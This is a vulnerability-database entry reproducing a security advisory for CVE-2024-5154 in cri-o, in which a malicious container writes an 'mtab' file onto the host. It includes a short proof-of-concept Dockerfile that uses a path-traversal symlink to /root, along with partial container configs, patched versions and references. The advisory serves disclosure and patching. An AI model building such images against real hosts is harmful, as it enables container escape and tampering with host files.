Fluid Attacks Database

Description

malicious container creates symlink "mtab" on the host External

Impact

A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.

A workload built from this Dockerfile:

FROM docker.io/library/busybox as source
RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc

FROM scratch

COPY --from=source /bin /bin
COPY --from=source /lib /lib
COPY --from=source /extra ....

and this container config:

{
  "metadata": {
      "name": "busybox"
  },
  "image":{
      "image": "localhost/test"
  },
  "command": [...

and this sandbox config

{
  "metadata": {
    "name": "test-sandbox",
    "namespace": "default",
    "attempt": 1,
    "uid": "edishd83djaideaduwk28bcsb"
  },
  "linux": {...

will create a file on host /host/mtab

Patches

1.30.1, 1.29.5, 1.28.7

Workarounds

Unfortunately not

References

Are there any links users can visit to find out more?

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem	Package	Affected version	Patched versions
go	github.com/cri-o/cri-o	>=1.28.6 <1.28.7 \|\| >=1.29.4 <1.29.5 \|\| >=1.30.0 <1.30.1	1.28.7, 1.29.5, 1.30.1

Aliases

1. CVE-2024-51542. NVD-2024-51543. OSV-2024-51544. GHSA-j9hf-98c3-wrm85. GCVE-2024-51546. access.redhat.com7. access.redhat.com8. access.redhat.com9. access.redhat.com10. access.redhat.com11. access.redhat.com12. ACCESS-CVE-2024-5154

References

1. https://github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm82. https://bugzilla.redhat.com/show_bug.cgi?id=22801903. https://pkg.go.dev/vuln/GO-2024-2919

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.